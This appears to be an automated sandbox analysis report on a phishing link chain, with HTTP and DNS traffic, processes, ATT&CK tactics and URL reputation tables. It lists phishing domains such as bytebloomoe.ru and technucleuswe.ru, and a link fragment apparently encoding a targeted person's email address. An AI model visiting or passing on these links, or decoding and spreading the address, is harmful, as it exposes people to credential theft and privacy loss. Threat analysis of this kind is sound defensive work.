    Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bytebloomoe.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET // HTTP/1.1Host: technucleuswe.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET ///3799.php HTTP/1.1Host: technucleuswe.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficDNS traffic detected: DNS query: clicks.aweber.com
    Source: global trafficDNS traffic detected: DNS query: summitadvisor.co
    Source: global trafficDNS traffic detected: DNS query: bytebloomoe.ru
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: technucleuswe.ru
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1850929969:1723574616:8PT3AyiGmN4W4umEYHIb06JjWIFlP6lIjxkzNvrNFc0/8b2b466a48c34405/ca1f4aa5097dc0c HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 2986sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: ca1f4aa5097dc0csec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/0rq59/0x4AAAAAAAhE9zkCiN0ETgsg/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 13 Aug 2024 19:57:37 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, max-age=0pragma: no-cachevary: Accept-EncodingCF-Cache-Status: BYPASSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9RETPoyNhtflLfsBYjg71yrDKAEAuv5jH1I0GE9jcfVaZuf8ZUj7dK7AvI8af%2F5ZFu%2BvWo%2F49k%2FPkCgRPKiOiaqOR46jbJaNx6vRzJA3HRNA5tEc0IZogx1z2u2Ye3Pp8w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8b2b46754ac180dc-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 13 Aug 2024 19:57:39 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: v1CaFaoWbtfSntS/KNOu3ISjYhMSOpEVc1o=$WgtnflzXTe3S8NwJcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8b2b467f288a435e-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 13 Aug 2024 19:57:43 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: V6UbANGPjokj1YPGJ0zc98HC3XlPczKnupM=$H5YEnUBjYsnO5VH2Server: cloudflareCF-RAY: 8b2b469aef8ac466-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 13 Aug 2024 19:57:59 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: u2kld40FsZpxTLiTvu+i9hedgqEB0g7IXhc=$ETjpopFnnPkk+J/cServer: cloudflareCF-RAY: 8b2b46ff0c95c41b-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 13 Aug 2024 19:58:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, max-age=0pragma: no-cachevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NuCLcwhOH3BOSV4nEUqHvLvT7sEbfMdKfU7%2FSp6%2BDXheB4JDRANpTyuGrG3v93XXhgQIVATEgSL3nX6YKbfCI6y%2B4ItNsuych36cIF4KjZrnPIhFU9Xmams0MF3hDj08jg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8b2b4722e9c743d6-EWRalt-svc: h3=":443"; ma=86400
    Source: chromecache_53.2.drString found in binary or memory: https://bytebloomoe.ru/8QnWX/#
    Source: chromecache_58.2.drString found in binary or memory: https://cdn.jsdelivr.net/npm/
    Source: chromecache_58.2.drString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
    Source: chromecache_58.2.drString found in binary or memory: https://code.jquery.com/jquery-3.5.1.slim.min.js
    Source: chromecache_58.2.drString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js
    Source: chromecache_58.2.drString found in binary or memory: https://technucleuswe.ru/#
    Source: chromecache_58.2.drString found in binary or memory: https://technucleuswe.ru/#about
    Source: chromecache_58.2.drString found in binary or memory: https://technucleuswe.ru/#classic-cars
    Source: chromecache_58.2.drString found in binary or memory: https://technucleuswe.ru/#contact
    Source: chromecache_58.2.drString found in binary or memory: https://technucleuswe.ru/#electric-vehicles
    Source: chromecache_58.2.drString found in binary or memory: https://technucleuswe.ru/#faq
    Source: chromecache_58.2.drString found in binary or memory: https://technucleuswe.ru/#learn-more
    Source: chromecache_58.2.drString found in binary or memory: https://technucleuswe.ru/#modern-supercars
    Source: chromecache_58.2.drString found in binary or memory: https://technucleuswe.ru/#privacy
    Source: chromecache_58.2.drString found in binary or memory: https://technucleuswe.ru/#services
    Source: chromecache_58.2.drString found in binary or memory: https://technucleuswe.ru/#terms
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 59185 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 59191 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 59201 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59202
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59201
    Source: unknownNetwork traffic detected: HTTP traffic on port 59196 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59203
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59200
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 59197 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 59188 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 59194 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 59203 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59187
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59186
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59189
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59188
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59185
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59184
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 59189 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 59200 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 59195 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59197
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59194
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59193
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59196
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59195
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59190
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59192
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59191
    Source: unknownNetwork traffic detected: HTTP traffic on port 59186 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 59192 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 59187 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 59202 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 59193 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 59184 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 59190 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49715 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49724 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49727 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49735 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:59184 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:59197 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:59203 version: TLS 1.2
    Source: classification engineClassification label: mal76.phis.win@20/22@28/14
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1728 --field-trial-handle=2064,i,17365023842591099660,13906610943497592802,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://clicks.aweber.com/y/ct/?l=1Lr_k&m=h9RNUFV_ixtHDTP&b=0la683CmRD4xZfKbroa5Lg#McGF0dGkucGFzc21vcmVAZmlyc3RvbnRhcmlvLmNvbQ=="
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1728 --field-trial-handle=2064,i,17365023842591099660,13906610943497592802,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid AccountsWindows Management Instrumentation1
    Scripting
    1
    Process Injection
    1
    Process Injection
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Deobfuscate/Decode Files or Information
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    https://clicks.aweber.com/y/ct/?l=1Lr_k&m=h9RNUFV_ixtHDTP&b=0la683CmRD4xZfKbroa5Lg#McGF0dGkucGFzc21vcmVAZmlyc3RvbnRhcmlvLmNvbQ==0%Avira URL Cloudsafe
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://cdn.jsdelivr.net/npm/bootstrap0%URL Reputationsafe
    https://code.jquery.com/jquery-3.6.0.min.js0%URL Reputationsafe
    https://code.jquery.com/jquery-3.5.1.slim.min.js0%URL Reputationsafe
    https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js0%URL Reputationsafe
    https://clicks.aweber.com/y/ct/?l=1Lr_k&m=h9RNUFV_ixtHDTP&b=0la683CmRD4xZfKbroa5Lg0%Avira URL Cloudsafe
    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8b2b466a48c34405/1723579057997/X0zYzRAJGWXc7Vm0%Avira URL Cloudsafe
    https://technucleuswe.ru/#privacy0%Avira URL Cloudsafe
    https://cdn.jsdelivr.net/npm/0%Avira URL Cloudsafe
    https://technucleuswe.ru/#contact0%Avira URL Cloudsafe
    https://bytebloomoe.ru/8QnWX/,0%Avira URL Cloudsafe
    https://bytebloomoe.ru/8QnWX/#0%Avira URL Cloudsafe
    https://challenges.cloudflare.com/turnstile/v0/api.js0%Avira URL Cloudsafe
    https://technucleuswe.ru/#modern-supercars0%Avira URL Cloudsafe
    https://technucleuswe.ru/#services0%Avira URL Cloudsafe
    https://summitadvisor.co/voipmessageauth/0%Avira URL Cloudsafe
    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8b2b466a48c34405/1723579057992/a91dc2b27de76374949a5aaa4b4f6973df0e1dcc1f382531160071965982b7b2/xD8E48zaUVWvwil0%Avira URL Cloudsafe
    https://a.nel.cloudflare.com/report/v4?s=NuCLcwhOH3BOSV4nEUqHvLvT7sEbfMdKfU7%2FSp6%2BDXheB4JDRANpTyuGrG3v93XXhgQIVATEgSL3nX6YKbfCI6y%2B4ItNsuych36cIF4KjZrnPIhFU9Xmams0MF3hDj08jg%3D%3D0%Avira URL Cloudsafe
    https://technucleuswe.ru/#electric-vehicles0%Avira URL Cloudsafe
    https://bytebloomoe.ru/8QnWX/0%Avira URL Cloudsafe
    https://technucleuswe.ru/#classic-cars0%Avira URL Cloudsafe
    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D0%Avira URL Cloudsafe
    https://technucleuswe.ru///3799.php0%Avira URL Cloudsafe
    https://technucleuswe.ru/#faq0%Avira URL Cloudsafe
    https://technucleuswe.ru//0%Avira URL Cloudsafe
    https://technucleuswe.ru/#about0%Avira URL Cloudsafe
    https://technucleuswe.ru/#0%Avira URL Cloudsafe
    https://bytebloomoe.ru/favicon.ico0%Avira URL Cloudsafe
    https://challenges.cloudflare.com/turnstile/v0/b/cc21665cd7b9/api.js0%Avira URL Cloudsafe
    https://technucleuswe.ru/#terms0%Avira URL Cloudsafe
    https://technucleuswe.ru/#learn-more0%Avira URL Cloudsafe
    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1850929969:1723574616:8PT3AyiGmN4W4umEYHIb06JjWIFlP6lIjxkzNvrNFc0/8b2b466a48c34405/ca1f4aa5097dc0c0%Avira URL Cloudsafe
    https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js0%Avira URL Cloudsafe
    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8b2b466a48c34405&lang=auto0%Avira URL Cloudsafe
    https://a.nel.cloudflare.com/report/v4?s=9RETPoyNhtflLfsBYjg71yrDKAEAuv5jH1I0GE9jcfVaZuf8ZUj7dK7AvI8af%2F5ZFu%2BvWo%2F49k%2FPkCgRPKiOiaqOR46jbJaNx6vRzJA3HRNA5tEc0IZogx1z2u2Ye3Pp8w%3D%3D0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      unknown
      technucleuswe.ru
      188.114.96.3
      truetrue
        unknown
        code.jquery.com
        151.101.2.137
        truefalse
          unknown
          cdnjs.cloudflare.com
          104.17.25.14
          truefalse
            unknown
            challenges.cloudflare.com
            104.18.95.41
            truefalse
              unknown
              www.google.com
              142.250.185.132
              truefalse
                unknown
                clicks.aweber.com
                104.18.21.223
                truefalse
                  unknown
                  bytebloomoe.ru
                  104.21.81.207
                  truetrue
                    unknown
                    summitadvisor.co
                    162.241.87.113
                    truefalse
                      unknown
                      fp2e7a.wpc.phicdn.net
                      192.229.221.95
                      truefalse
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://code.jquery.com/jquery-3.6.0.min.jsfalse
                        • URL Reputation: safe
                        unknown
                        https://clicks.aweber.com/y/ct/?l=1Lr_k&m=h9RNUFV_ixtHDTP&b=0la683CmRD4xZfKbroa5Lgfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8b2b466a48c34405/1723579057997/X0zYzRAJGWXc7Vmfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://bytebloomoe.ru/8QnWX/,false
                        • Avira URL Cloud: safe
                        unknown
                        https://challenges.cloudflare.com/turnstile/v0/api.jsfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://summitadvisor.co/voipmessageauth/false
                        • Avira URL Cloud: safe
                        unknown
                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8b2b466a48c34405/1723579057992/a91dc2b27de76374949a5aaa4b4f6973df0e1dcc1f382531160071965982b7b2/xD8E48zaUVWvwilfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/0rq59/0x4AAAAAAAhE9zkCiN0ETgsg/auto/fbE/normal/auto/false
                          unknown
                          https://bytebloomoe.ru/8QnWX/#McGF0dGkucGFzc21vcmVAZmlyc3RvbnRhcmlvLmNvbQ==true
                            unknown
                            https://a.nel.cloudflare.com/report/v4?s=NuCLcwhOH3BOSV4nEUqHvLvT7sEbfMdKfU7%2FSp6%2BDXheB4JDRANpTyuGrG3v93XXhgQIVATEgSL3nX6YKbfCI6y%2B4ItNsuych36cIF4KjZrnPIhFU9Xmams0MF3hDj08jg%3D%3Dfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://bytebloomoe.ru/8QnWX/false
                            • Avira URL Cloud: safe
                            unknown
                            https://technucleuswe.ru///3799.phptrue
                            • Avira URL Cloud: safe
                            unknown
                            https://technucleuswe.ru//true
                            • Avira URL Cloud: safe
                            unknown
                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3Dfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://challenges.cloudflare.com/turnstile/v0/b/cc21665cd7b9/api.jsfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://bytebloomoe.ru/favicon.icofalse
                            • Avira URL Cloud: safe
                            unknown
                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1850929969:1723574616:8PT3AyiGmN4W4umEYHIb06JjWIFlP6lIjxkzNvrNFc0/8b2b466a48c34405/ca1f4aa5097dc0cfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8b2b466a48c34405&lang=autofalse
                            • Avira URL Cloud: safe
                            unknown
                            https://a.nel.cloudflare.com/report/v4?s=9RETPoyNhtflLfsBYjg71yrDKAEAuv5jH1I0GE9jcfVaZuf8ZUj7dK7AvI8af%2F5ZFu%2BvWo%2F49k%2FPkCgRPKiOiaqOR46jbJaNx6vRzJA3HRNA5tEc0IZogx1z2u2Ye3Pp8w%3D%3Dfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.jsfalse
                            • Avira URL Cloud: safe
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://cdn.jsdelivr.net/npm/chromecache_58.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://cdn.jsdelivr.net/npm/bootstrapchromecache_58.2.drfalse
                            • URL Reputation: safe
                            unknown
                            https://technucleuswe.ru/#contactchromecache_58.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://code.jquery.com/jquery-3.5.1.slim.min.jschromecache_58.2.drfalse
                            • URL Reputation: safe
                            unknown
                            https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.jschromecache_58.2.drfalse
                            • URL Reputation: safe
                            unknown
                            https://technucleuswe.ru/#serviceschromecache_58.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://bytebloomoe.ru/8QnWX/#chromecache_53.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://technucleuswe.ru/#modern-supercarschromecache_58.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://technucleuswe.ru/#privacychromecache_58.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
